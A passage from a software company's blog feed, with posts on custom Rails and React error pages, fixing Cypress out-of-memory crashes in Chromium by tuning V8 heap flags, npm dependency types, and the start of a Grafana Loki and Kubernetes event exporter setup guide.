};</code></pre><p>Let's look at the <code>ErrorPage</code> component. The component reads the error data from the Zustand store and displays the appropriate error message and picture.</p><pre><code class="language-jsx">import { pick } from &quot;ramda&quot;;
import { useErrorDisplayStore } from &quot;./useDisplayErrorPage&quot;;
import { shallow } from &quot;zustand/shallow&quot;;

const ERRORS = {
  404: {
    imageSrc: &quot;not-found.png&quot;,
    errorMsg: &quot;The page you're looking for can't be found.&quot;,
    title: &quot;Page not found&quot;,
  },
  403: {
    imageSrc: &quot;unauthorized.png&quot;,
    errorMsg: &quot;You don't have permission to access this page.&quot;,
    title: &quot;Unauthorized&quot;,
  },
  500: {
    imageSrc: &quot;server-error.png&quot;,
    errorMsg:
      &quot;The server encountered an error and could not complete your request.&quot;,
    title: &quot;Internal server error&quot;,
  },
};

const ErrorPage = ({ statusCode }) =&gt; {
  const { statusCode: storeStatusCode } = useErrorDisplayStore(
    pick([&quot;statusCode&quot;]),
    shallow
  );
  const status = statusCode || storeStatusCode;
  const { imageSrc, errorMsg, title } = ERRORS[status] || ERRORS[404];

  return (
    &lt;div className=&quot;flex flex-col items-center justify-center h-screen&quot;&gt;
      &lt;title&gt;{title}&lt;/title&gt;
      &lt;img src={imageSrc} className=&quot;mb-4&quot; alt=&quot;Error Image&quot; /&gt;
      &lt;div className=&quot;text-lg font-medium&quot;&gt;{errorMsg}&lt;/div&gt;
    &lt;/div&gt;
  );
};

export default ErrorPage;</code></pre><h2>Custom error pages in
Rails</h2><p>Ruby on Rails comes with default error pages for commonly encountered errors such as 404, 500, and 422. Each of these has an associated static HTML page located within the public directory. Even though we can customize them to look like our <code>ErrorPage</code> component, maintaining error pages in different places will be difficult, and in the long run, they can go out of sync. So, we decided to use the <code>ErrorPage</code> component for these scenarios as well.</p><p>To accomplish this, we'll start by creating a controller named <code>ErrorsController</code>. This controller will contain a single <code>show</code> action, where we'll extract the error code from the raised exception and render the appropriate view.</p><pre><code class="language-rb">class ErrorsController &lt; ApplicationController
  before_action :set_default_format

  def show
    @status_code = params[:status_code] || &quot;404&quot;
    error = @status_code == &quot;404&quot; ? &quot;Not Found&quot; : &quot;Something went wrong!&quot;

    if params[:url]
      Rails.logger.warn &quot;ActionController::RoutingError (No route matches [#{request.method}] /#{params[:url]})&quot;
    end

    respond_to do |format|
      format.json { render json: { error: }, status: @status_code }
      format.any { render status: @status_code }
    end
  end

  private

    def set_default_format
      request.format = :html unless request.format == :json
    end
end</code></pre><p>Next, we'll create a <code>view</code> file for this show action.
In this view file, we will render the <code>Error</code> component and pass <code>error_status_code</code> to it as a prop.</p><pre><code class="language-rb">&lt;%= react_component(&quot;Error&quot;, { error_status_code: @status_code }, { class: &quot;root-container&quot; }) %&gt;</code></pre><p>In the <code>Error</code> component, we will render the same <code>ErrorPage</code> component created above and pass on the error status code received.</p><pre><code class="language-jsx">import React from &quot;react&quot;;
import ErrorPage from &quot;./ErrorPage&quot;;

const reactProps = JSON.parse(
  document.getElementsByClassName(&quot;root-container&quot;)[0]?.dataset?.reactProps ||
    &quot;{}&quot;
);

const Error = () =&gt; &lt;ErrorPage statusCode={reactProps.error_status_code} /&gt;;

export default Error;</code></pre><p>Now add the following route in the <code>config/routes.rb</code> file to point <code>404</code> and <code>500</code> requests to the <code>show</code> action in the <code>ErrorsController</code>.</p><pre><code class="language-rb">Rails.application.routes.draw do
  match &quot;/:status_code&quot;, constraints: { status_code: /404|500/, format: :html }, to: &quot;errors#show&quot;, via: :all
end</code></pre><p>Finally, we need to tell the Rails application to use our new controller and routes setup instead of those HTML templates in the public directory. For this, add the following to the <code>class Application &lt; Rails::Application</code> block in the <code>config/application.rb</code> file.</p><pre><code class="language-rb">config.exceptions_app = self.routes</code></pre><h3>Handling unmatched routes</h3><p>Sometimes, we get random requests from bots and crawlers trying to access paths that don't exist. When this occurs, our server raises an <code>ActionController::RoutingError</code> exception. This also happens when a user mistypes a URL.
However, in such cases, instead of just throwing the exception, we should inform the user that what they are requesting does not exist by showing a 404 page.</p><p>To handle this, we implemented a <code>catch_all</code> route which, as the name suggests, catches any request that doesn't match an already defined route. It is placed at the end of our routes configuration. This placement ensures that it is only matched if a request doesn't match any other defined route.</p><pre><code class="language-rb">Rails.application.routes.draw do
  # Define other routes here...

  # Catch-all route for handling errors
  match &quot;:url&quot;, to: &quot;errors#show&quot;, via: :all, url: /.*/, constraints: -&gt; (request) do
    request.path.exclude?(&quot;/rails/&quot;)
  end
end</code></pre><p>This route also uses the same <code>ErrorsController</code> mentioned above for handling unmatched requests and will show a 404 page.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we fixed the Cypress "Out of memory" error for Chromium browsers]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers"/>
      <updated>2024-05-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers</id>
      <content type="html"><![CDATA[<p>At BigBinary, we use <a href="https://www.cypress.io/">Cypress</a> as our primary end-to-end testing framework because of its simplicity and compatibility. We have 400+ tests across multiple products, most of which are long-running tests handling complex workflows. We use the most commonly used version of <a href="https://www.chromium.org/Home/">Chromium</a> as the test browser to make sure the tests capture how the majority uses our products. While the development has always been smooth sailing, the same cannot be said about the test runs. As the number of tests and the duration of each of them increased, our tests would randomly crash with the following error:</p><pre><code>We detected that the Chromium Renderer process just crashed.

This is the equivalent of seeing the 'sad face' when Chrome dies.

This can happen for a number of different reasons:

- You wrote an endless loop and you must fix your own code
- You are running Docker (there is an easy fix for this: see link below)
- You are running lots of tests on a memory intense application.
    - Try enabling experimentalMemoryManagement in your config file.
    - Try lowering numTestsKeptInMemory in your config file.
- You are running in a memory starved VM environment.
    - Try enabling experimentalMemoryManagement in your config file.
    - Try lowering numTestsKeptInMemory in your config file.
- There are problems with your GPU / GPU drivers
- There are browser bugs in Chromium

You can learn more, including how to fix Docker here:

https://on.cypress.io/renderer-process-crashed</code></pre><p>The occurrence of the crashes was rare initially. But as our test suites expanded, the crash frequency increased as well. The crashes were so frequent at one point that none of our tests would run to completion. Neither the solutions mentioned in the official documentation nor the suggestions in the community discussions (like enabling <code>experimentalMemoryManagement</code>) were effective.
This led us to investigate this problem.</p><h2>About our CI setup</h2><p>We used to run Cypress on <a href="https://circleci.com/docs/configuration-reference/#docker-execution-environment">CircleCI</a> on a medium Docker resource class. This resource class allocates 4GB of memory to the process. Later on, we moved to our home-grown CI solution, <a href="https://www.neeto.com/neetoci/">NeetoCI</a>, for running our Cypress tests, which gave us much more control over the test environment.</p><h2>The investigation setup</h2><p>Since the errors were caused by Cypress running out of memory, we started by looking into the resource utilization on the VM environment. We noticed that none of the crashed runs used more than 50% of the allotted memory. Memory starvation while only a portion of the allocated resources was in use meant that Cypress was not utilizing the full memory.</p><p>We couldn't reproduce this issue reliably, so we attempted to simulate the error by creating a high memory usage scenario. For the simulation, we created a dummy test that takes the following steps.</p><ol><li>Visit a page.</li><li>Get an element.</li><li>Save the element in the memory as a new alias.</li><li>Repeat steps 1-3 infinitely until the browser crashes.</li><li>During each iteration, log the iteration number to know how many iterations were completed successfully before the crash.</li></ol><p>For logging the iteration number, we used the <a href="https://docs.cypress.io/api/commands/task">Cypress task - log</a>, as illustrated in the official documentation. The iteration number provided us with an additional metric to compare the performance of the solutions we tried.
The code for implementing the investigation setup can be seen below.</p><pre><code class="language-javascript">const saveButtonAsAlias = iteration =&gt; {
  cy.get(&quot;.button&quot;).as(`button-${iteration}`);
  // Log the iteration number, then queue the next iteration so the recursion
  // never overflows the call stack.
  cy.task(&quot;log&quot;, iteration).then(() =&gt; saveButtonAsAlias(iteration + 1));
};

it(&quot;dummy test&quot;, () =&gt; {
  cy.visit(&quot;/&quot;);
  saveButtonAsAlias(1);
});</code></pre><p>The above code will save the same button component under different aliases in memory, thus simulating a high memory usage test environment. On executing this test, we saw that the memory usage peaked at about 1GB - 1.5GB in a 4GB Docker environment before the browser crashed.</p><h2>Solutions</h2><h3>1. Using an alternate browser</h3><p>Even though <a href="https://www.google.com/chrome/">Google Chrome</a> is the most popular browser in the market, it's far from being the most memory-efficient. So we tested other Chromium-based browsers available for Cypress and concluded that <a href="https://www.microsoft.com/en-us/edge">Microsoft Edge</a> ran the tests in a much more memory-efficient manner. While running the dummy test, we observed the memory usage by each of the browsers and compared the results.</p><p>Google Chrome ran the tests faster and crashed first when memory was starved. Microsoft Edge ran the tests at a similar pace initially, but when the memory was almost used up completely, the tests slowed down, and the browser started rigorous garbage collection. The memory usage increased at a gradual rate and more iterations were completed successfully, as compared to Chrome, before the browser crashed.
The table below shows the runtime comparison between Google Chrome and Microsoft Edge (higher runtime is better).</p><table><tr><td>Attempt</td><td>Google Chrome runtime before crash</td><td>Microsoft Edge runtime before crash</td></tr><tr><td>1</td><td>0:45</td><td>0:59</td></tr><tr><td>2</td><td>0:46</td><td>1:00</td></tr><tr><td>3</td><td>0:45</td><td>1:01</td></tr></table><p>While switching the browser improved the completion rate of the runs, it still didn't solve the issue completely. This led us to look for further enhancements.</p><h3>2. Increasing the max-old-space-size</h3><p>The most unusual behaviour we noticed in resource utilization was that Cypress did not use the entire allocated memory before crashing. To understand why Cypress behaves like this, we need a basic understanding of its architecture, which can be seen below.</p><p><img src="/blog_images/2024/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers/cypress-architecture.png" alt="Cypress architecture"></p><p>Cypress works as two different processes: the NodeJS application and the browser on which the tests run. When executing the <code>cypress run</code> and <code>cypress open</code> commands, we start the NodeJS application. This NodeJS application goes through our tests and configuration and loads them into our preferred browser, where they are executed.</p><p>The split architecture of Cypress means that the memory allocations for the NodeJS process and the Chromium browser are different. This is why the total memory usage by the NodeJS process doesn't give us proper insights into why the Chromium process crashed and was starved of memory.
To analyze the browser memory usage, we used the browser <a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/memory">Performance APIs</a>.</p><p>We found that the Cypress tests were allocated only about 500MB of memory despite the test environment having 4GB of memory. So the solution was to increase the heap memory allocated to the Chromium renderer. The <a href="https://nodejs.org/api/cli.html#--max-old-space-sizesize-in-megabytes:~:text=are%20documented%20here%3A-,%2D%2Dmax%2Dold%2Dspace%2Dsize%3DSIZE,-(in%20megabytes)">max-old-space-size</a> command-line flag is used to set the V8 engine's maximum old memory limit. When the memory usage approaches this limit, garbage collection begins in an effort to free up memory. So by manually increasing the <code>max-old-space-size</code> for the Chromium renderer, we can increase the heap memory allocated to it.</p><p>If it were a Node application, increasing the <code>max-old-space-size</code> would be as simple as executing the Cypress command as follows:</p><p><code>NODE_OPTIONS=--max-old-space-size=3500 yarn cypress run</code></p><p>But because of the split architecture, executing the above command only increases the <code>max-old-space-size</code> for the NodeJS application and not for the actual Cypress tests running in the Chromium browser.
To increase the <code>max-old-space-size</code> for the Chromium renderer we need to make use of the <a href="https://docs.cypress.io/api/plugins/browser-launch-api">Browser launch APIs</a> provided by Cypress.</p><pre><code class="language-javascript">// cypress.config.js
const { defineConfig } = require(&quot;cypress&quot;);

module.exports = defineConfig({
  // setupNodeEvents can be defined in either
  // the e2e or component configuration
  e2e: {
    setupNodeEvents(on, config) {
      on(&quot;before:browser:launch&quot;, (browser = {}, launchOptions) =&gt; {
        launchOptions.args.push(&quot;--js-flags=--max-old-space-size=3500&quot;);
        return launchOptions;
      });
    },
  },
});
</code></pre><p>In the configuration above, we pass the <code>--max-old-space-size</code> flag within the <code>--js-flags</code> Chromium flag. This is because Chromium expects V8 options to be passed through the <code>--js-flags</code> command-line switch. The above configuration increases the maximum usable heap size of the Cypress tests to 3500 MB.</p><p>Depending on the available memory in the test environment, we can increase or decrease the <code>max-old-space-size</code> value. The benchmarking results after making this configuration change showed a significant improvement in performance. 
The table below documents the runtime comparison between the default <code>max-old-space-size</code> and <code>max-old-space-size</code> set to 3500 MB (higher runtime is better).</p><table><tr><td>Attempt</td><td>Runtime before crash with default <code>max-old-space-size</code></td><td>Runtime before crash with <code>max-old-space-size=3500</code></td></tr><tr><td>1</td><td>0:44</td><td>2:22</td></tr><tr><td>2</td><td>0:45</td><td>2:20</td></tr><tr><td>3</td><td>0:45</td><td>2:21</td></tr></table><p>The benchmark above shows the improvement in performance after increasing the <code>max-old-space-size</code> in the Google Chrome browser. By switching the browser to Microsoft Edge we got even better results. The table below shows the runtime comparison between the default <code>max-old-space-size</code> and <code>max-old-space-size</code> set to 3500 MB in each of these browsers (higher runtime is better).</p><table><tr><td>Attempt</td><td colspan="2">Runtime before crash with default <code>max-old-space-size</code></td><td colspan="2">Runtime before crash with <code>max-old-space-size=3500</code></td></tr><tr><td></td><td>Google Chrome</td><td>Microsoft Edge</td><td>Google Chrome</td><td>Microsoft Edge</td></tr><tr><td>1</td><td>0:44</td><td>0:59</td><td>2:22</td><td>2:40</td></tr><tr><td>2</td><td>0:45</td><td>1:00</td><td>2:20</td><td>2:38</td></tr><tr><td>3</td><td>0:45</td><td>1:01</td><td>2:21</td><td>2:37</td></tr></table><h2>Additional tips to reduce memory usage in Cypress</h2><ol><li><p>Chromium browsers sandbox each page, which increases memory usage. Since we're running the Cypress tests on trusted sites, we can pass the <code>--no-sandbox</code> flag to reduce memory consumption.</p></li><li><p>When running Cypress tests in headless mode, we can disable WebGL graphics on the rendered pages to avoid additional memory usage by passing the <code>--disable-gl-drawing-for-tests</code> flag.</p></li><li><p>When running tests on low-resource machines, using hardware acceleration can impact performance. 
To avoid this we can pass the <code>--disable-gpu</code> flag.</p></li></ol><pre><code class="language-javascript">// cypress.config.js
const { defineConfig } = require(&quot;cypress&quot;);

module.exports = defineConfig({
  // setupNodeEvents can be defined in either
  // the e2e or component configuration
  e2e: {
    setupNodeEvents(on, config) {
      on(&quot;before:browser:launch&quot;, (browser, launchOptions) =&gt; {
        if ([&quot;chrome&quot;, &quot;edge&quot;].includes(browser.name)) {
          if (browser.isHeadless) {
            launchOptions.args.push(&quot;--no-sandbox&quot;);
            launchOptions.args.push(&quot;--disable-gl-drawing-for-tests&quot;);
            launchOptions.args.push(&quot;--disable-gpu&quot;);
          }
          launchOptions.args.push(&quot;--js-flags=--max-old-space-size=3500&quot;);
        }
        return launchOptions;
      });
    },
  },
});
</code></pre><h2>Conclusion</h2><p>Since Cypress tests are executed inside the browser, all the constraints of a browser environment apply to them, including the memory constraints. The default configurations in browsers are targeted to run on the widest range of systems. 
When facing memory starvation issues during complex and long-running tests, we should configure Cypress according to the resources available in the environment in which our tests are running. Increasing the memory available to the browser by manually setting an appropriate <code>max-old-space-size</code> value and choosing a memory-efficient browser will make sure that Cypress runs smoothly in most scenarios.</p><h2>References</h2><ul><li><a href="https://github.com/cypress-io/cypress/issues/24719">Chromium renderer crash GitHub issue</a></li><li><a href="https://www.memorymanagement.org/glossary/s.html">Memory management glossary</a></li><li><a href="https://support.circleci.com/hc/en-us/articles/360009208393-How-Can-I-Increase-the-Max-Memory-for-Node">Increasing node memory size</a></li><li><a href="https://github.com/cypress-io/cypress-docker-images/blob/master/included/10.0.0/Dockerfile">Cypress docker images</a></li><li><a href="https://peter.sh/experiments/chromium-command-line-switches">Chromium command-line switches</a></li><li><a href="https://docs.docker.com/config/containers/resource_constraints/">Docker resource constraints</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Difference between dependencies, devDependencies and peerDependencies]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/different-dependencies"/>
      <updated>2024-05-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/different-dependencies</id>
      <content type="html"><![CDATA[<p>In a JavaScript project, understanding the distinctions between <code>dependencies</code>, <code>devDependencies</code>, and <code>peerDependencies</code> is crucial for effective package management. Each plays a distinct role in shaping how a project is built and distributed. In this blog, we'll explore these terms and their differences.</p><h2>dependencies</h2><p>The packages that are actually needed for a project to function should be listed under <code>dependencies</code>. These packages are always installed within that project. If the project is also a package, then these dependencies will also get installed in the host project that uses this package. Below are some common examples of what might go under <code>dependencies</code>.</p><pre><code class="language-json">&quot;dependencies&quot;: {
  &quot;dayjs&quot;: &quot;1.11.1&quot;,
  &quot;immer&quot;: &quot;^10.0.2&quot;,
  &quot;ramda&quot;: &quot;^0.29.0&quot;,
  &quot;react&quot;: &quot;^18.2.0&quot;
}
</code></pre><p>It's important to understand that the above packages do not always have to be under <code>dependencies</code>. For example, if <code>dayjs</code> is needed only for development, deployment or testing purposes, it should not be listed under <code>dependencies</code> but rather in the <code>devDependencies</code> section, because <code>dependencies</code> will be bundled with the main code, whereas <code>devDependencies</code> will not. So adding dependencies that are used only for development under <code>dependencies</code> is unnecessary and will increase the bundle size, affecting the performance of the application.</p><p>To add a package to the <code>dependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add package-name</code></pre><p>If we are shipping a package, all our dependencies are installed in the root of the host project's <code>node_modules</code>. 
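</p><p>For instance, a shipped package's own <code>package.json</code> might declare (a hypothetical package; the same names appear in the folder structure below):</p><pre><code class="language-json">{
  &quot;name&quot;: &quot;my-awesome-lib&quot;,
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;dependencies&quot;: {
    &quot;dayjs&quot;: &quot;1.0.0&quot;
  }
}
</code></pre><p>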
However, an exception occurs if the host project already has the same dependency but with a different version. In this scenario, that specific conflicting dependency will be installed within the <code>node_modules</code> of our package to avoid version conflicts.</p><p>To explain a bit more, let's say we have <code>dayjs@1.0.0</code> as one of our dependencies, but the host project uses <code>2.0.0</code>. Then both versions will be installed: <code>2.0.0</code> in the root <code>node_modules</code> and <code>1.0.0</code> in our package's <code>node_modules</code>. This way, our package can continue to use <code>1.0.0</code> while the host uses <code>2.0.0</code>. The folder structure of that host will look something like below.</p><pre><code class="language-javascript">host-project-app
  src
    index.js
  node_modules
    react
    dayjs
    my-awesome-lib
      node_modules
        dayjs
  package.json
  README.md
</code></pre><h2>devDependencies</h2><p>Packages listed in <code>devDependencies</code> are used specifically for development purposes. Any dependencies that do not go into our actual code are listed here and not under <code>dependencies</code>. These dependencies won't be installed in a production environment or in a host project if our project acts as a package. Here are a few examples of what might belong in <code>devDependencies</code>.</p><pre><code class="language-json">&quot;devDependencies&quot;: {
  &quot;@babel/core&quot;: &quot;^7.16.5&quot;,
  &quot;eslint&quot;: &quot;^8.41.0&quot;,
  &quot;husky&quot;: &quot;^7.0.4&quot;,
  &quot;jest&quot;: &quot;27.5.1&quot;,
  &quot;prettier&quot;: &quot;^2.8.8&quot;
}
</code></pre><p>Just like in <code>dependencies</code>, these packages may not always be in <code>devDependencies</code>. For example, if we are building a package that enhances Jest's testing capabilities, then we should place <code>jest</code> under <code>dependencies</code>. 
Otherwise our host project will break, because <code>jest</code> will not be installed in the host project.</p><p>To add a package to the <code>devDependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add -D package-name</code></pre><h2>peerDependencies</h2><p><code>peerDependencies</code> are needed only if we are building a package. They allow the host to install any desired version unless we specify otherwise.</p><p>If we are using <code>yarn</code> as the package manager, then <code>peerDependencies</code> are not installed automatically. We have to install them manually, even in our own package. But there is a slight difference if you are using <code>npm</code>: up to version 6, <code>npm</code> does not install <code>peerDependencies</code> automatically. However, this changes from version 7 onwards, as it will install <code>peerDependencies</code> automatically. So if we are using <code>yarn</code> or <code>npm&lt;=v6</code> and we have, for example, Storybook or Jest tests in our package project, then we have to install <code>peerDependencies</code> as <code>devDependencies</code> (not as <code>dependencies</code>, which defeats the purpose) as well.</p><pre><code class="language-json">&quot;devDependencies&quot;: {
  &quot;@babel/core&quot;: &quot;^7.16.5&quot;,
  &quot;eslint&quot;: &quot;^8.41.0&quot;,
  &quot;husky&quot;: &quot;^7.0.4&quot;,
  &quot;jest&quot;: &quot;27.5.1&quot;,
  &quot;prettier&quot;: &quot;^2.8.8&quot;,
  &quot;dayjs&quot;: &quot;1.11.1&quot;
},
&quot;peerDependencies&quot;: {
  &quot;dayjs&quot;: &quot;latest&quot;
}
</code></pre><p>You might wonder about its purpose if manual installation is required. It serves as a means for our package project to specify essential dependencies required for the package to function properly. 
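</p><p>For example, a component library might pin only a minimum supported version and leave the exact choice to the host (a hypothetical snippet):</p><pre><code class="language-json">&quot;peerDependencies&quot;: {
  &quot;react&quot;: &quot;&gt;=17.0.0&quot;
}
</code></pre><p>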
Simultaneously, it grants control to the host project to choose which versions to install.</p><p>To add a package to the <code>peerDependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add --peer package-name</code></pre><p>Now the tricky part is determining whether a particular dependency should go under <code>dependencies</code> or <code>peerDependencies</code>. Unfortunately, there is no clear answer here. But there are some questions we can ask ourselves to narrow it down.</p><ol><li><p>If the specific version of the dependency is important for our package, that is, if using a different version breaks our package, then we definitely want to place that package under <code>dependencies</code>.</p><p>It is possible to place such dependencies under <code>peerDependencies</code> and specify supported versions like below, but it is not a good practice.</p></li></ol><pre><code class="language-json">&quot;peerDependencies&quot;: {
  &quot;dayjs&quot;: &quot;1.2.0 || 1.5.1&quot;
}
</code></pre><ol start="2"><li>If the dependency is a widely used package like <code>react</code>, it is better to place it under <code>peerDependencies</code> and ensure that our package works with different versions of that dependency. This way, the dependency installed in the host project can be reused by our package without installing a separate version.</li><li>If we want to make changes to a dependency in a manner that impacts its usage within the host project, then place it under <code>peerDependencies</code>. A good example of this: at <a href="https://www.neeto.com/">neeto</a> we have a package called <code>neeto-commons-frontend</code> which extracts numerous common functionalities utilized across various products. One such functionality is our error handling system, for which we use an <a href="https://axios-http.com/docs/interceptors">Axios interceptor</a>. For this interceptor to work, it's crucial that it is applied to the same instance of Axios. 
To elaborate further, if we add Axios under <code>dependencies</code> in <code>neeto-commons-frontend</code>, but the host project uses a different Axios version, we will be making changes to the Axios instance that's in the <code>node_modules</code> of <code>neeto-commons-frontend</code> and not of the host project, which means the functionality will not work in the host project.</li></ol><p>Another rationale behind utilizing <code>peerDependencies</code> is its substantial impact on reducing the bundle size, particularly when bundling our package. If we are using Rollup, placing certain packages under <code>peerDependencies</code> doesn't automatically exclude them from the bundle. We need to explicitly specify this in the Rollup configuration. This is achieved through the Rollup <code>external</code> configuration option, where we provide a list of <code>peerDependencies</code> to be excluded from the bundle. To simplify this process, <code>rollup-plugin-peer-deps-external</code> automates the inclusion of <code>peerDependencies</code> within the <code>external</code> configuration.</p><pre><code class="language-js">import peerDepsExternal from &quot;rollup-plugin-peer-deps-external&quot;;

export default {
  plugins: [
    // Preferably set as first plugin.
    peerDepsExternal(),
  ],
};
</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Grafana Loki and Kubernetes Event exporter]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/k8s-event-exporter-and-grafana-loki-integration"/>
      <updated>2024-05-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/k8s-event-exporter-and-grafana-loki-integration</id>
      <content type="html"><![CDATA[<p>In the previous <a href="https://www.bigbinary.com/blog/prometheus-and-grafana-integration">blog</a>, we discussed integrating <a href="https://prometheus.io/">Prometheus</a> and <a href="https://grafana.com/">Grafana</a> in the Kubernetes Cluster. In this blog, we'll explore how to integrate the <a href="https://github.com/resmoio/kubernetes-event-exporter">Kubernetes Event exporter</a> &amp; <a href="https://grafana.com/oss/loki/">Grafana Loki</a> into your Kubernetes Cluster using a Helm chart.</p><p>Additionally, you'll also learn how to add Grafana Loki as a data source to your Grafana Dashboard. This will help you visualize the Kubernetes events.</p><p>Furthermore, we'll delve into the specifics of setting up the Event exporter and Grafana Loki, ensuring you understand each step of the process. From downloading and configuring the necessary Helm charts to understanding the Grafana Loki dashboard, we'll cover it all.</p><p>By the end of this blog, you'll be able to fully utilize Grafana Loki and Kubernetes Event Exporter, gaining insights from your Kubernetes events.</p><h2>How Kubernetes event exporter can help us in monitoring health</h2><p>Objects in Kubernetes, such as Pods, Deployments, Ingresses and Services, publish events to indicate status updates or problems. Most of the time, these events are overlooked, and their 1-hour lifespan means important updates can be missed. They are also not searchable and cannot be aggregated.</p><p>For instance, they can alert you to changes in the state of pods, errors in scheduling, and resource constraints. 
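</p><p>These short-lived events can be inspected ad hoc with <code>kubectl</code>, sorted by the most recent:</p><pre><code class="language-bash">kubectl get events --all-namespaces --sort-by=.lastTimestamp</code></pre><p>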
Therefore, exporting these events and visualizing them can be crucial for maintaining the health of your cluster.</p><p>Kubernetes event exporter allows exporting the often missed Kubernetes events to various outputs so that they can be used for observability or alerting purposes. We can have multiple receivers to export the events from the Kubernetes cluster.</p><ul><li><a href="https://www.opsgenie.com/">Opsgenie</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#webhookshttp">Webhooks/HTTP</a></li><li><a href="https://www.elastic.co/">Elasticsearch</a></li><li><a href="https://opensearch.org/">OpenSearch</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#slack">Slack</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#kinesis">Kinesis</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#firehose">Firehose</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#sns">SNS</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#sqs">SQS</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#file">File</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#stdout">Stdout</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#kafka">Kafka</a></li><li><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/OpsCenter.html">OpsCenter</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#customizing-payload">Customize Payload</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#pubsub">Pubsub</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#teams">Teams</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#syslog">Syslog</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#bigquery">Bigquery</a></li><li><a 
href="https://github.com/resmoio/kubernetes-event-exporter#pipe">Pipe</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#aws-eventbridge">Event Bridge</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#loki">Grafana Loki</a></li></ul><h2>Setting up Grafana Loki &amp; Kubernetes event exporter using Helm chart</h2><p>We will once again use <a href="https://artifacthub.io/">ArtifactHub</a>, which provides a Helm chart for installing Grafana Loki onto a Kubernetes Cluster. If you need instructions on how to install Helm on your system, you can refer to this blog.</p><p>In this blog post, we will install a Helm <a href="https://artifacthub.io/packages/helm/grafana/loki">chart</a> that sets up Loki in scalable mode, with separate read and write components that can be independently scaled. Alternatively, we can install Loki in monolithic mode, where the Helm chart installation runs the Grafana Loki <em>single binary</em> within a Kubernetes cluster. You can learn more about this <a href="https://grafana.com/docs/loki/latest/setup/install/helm/install-monolithic/#install-the-monolithic-helm-chart">here</a>.</p><h3>1. Create S3 buckets</h3><ul><li><p>grafana-loki-chunks-bucket</p></li><li><p>grafana-loki-admin-bucket</p></li><li><p>grafana-loki-ruler-bucket</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-s3-buckets.png" alt="loki-s3-buckets.png"></p></li></ul><h3>2. 
Create a policy for Grafana Loki</h3><p>Create a new policy under IAM on Amazon AWS using the below snippet.</p><pre><code>{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;LokiStorage&quot;,
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Action&quot;: [
        &quot;s3:ListBucket&quot;,
        &quot;s3:PutObject&quot;,
        &quot;s3:GetObject&quot;,
        &quot;s3:DeleteObject&quot;
      ],
      &quot;Resource&quot;: [
        &quot;arn:aws:s3:::grafana-loki-chunks-bucket&quot;,
        &quot;arn:aws:s3:::grafana-loki-chunks-bucket/*&quot;,
        &quot;arn:aws:s3:::grafana-loki-admin-bucket&quot;,
        &quot;arn:aws:s3:::grafana-loki-admin-bucket/*&quot;,
        &quot;arn:aws:s3:::grafana-loki-ruler-bucket&quot;,
        &quot;arn:aws:s3:::grafana-loki-ruler-bucket/*&quot;
      ]
    }
  ]
}
</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/grafana-loki-policy.png" alt="grafana-loki-policy.png"></p><h3>3. 
Create a Role with the above permission</h3><p>Create a role with a custom trust policy and use the below snippet.</p><pre><code>{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Principal&quot;: {
        &quot;Federated&quot;: &quot;arn:aws:iam::account_id:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/open_id&quot;
      },
      &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,
      &quot;Condition&quot;: {
        &quot;StringEquals&quot;: {
          &quot;oidc.eks.us-east-1.amazonaws.com/id/open_id:aud&quot;: &quot;sts.amazonaws.com&quot;,
          &quot;oidc.eks.us-east-1.amazonaws.com/id/open_id:sub&quot;: &quot;system:serviceaccount:default:grafana-loki-access-s3-role-sa&quot;
        }
      }
    }
  ]
}
</code></pre><p>Note: Please update the account_id and open_id in the above snippet.</p><p><strong>grafana-loki-access-s3-role-sa</strong> is the service account name that we will mention in the Loki values.</p><h3>4. Add the Grafana Helm repository</h3><p>To add the repository, run these commands:</p><pre><code class="language-bash">helm repo add grafana https://grafana.github.io/helm-charts
helm repo update
</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/chart-add-output.png" alt="chart-add-output.png"></p><p>We have now added the Grafana chart repository and fetched the latest chart index.</p><h3>5. 
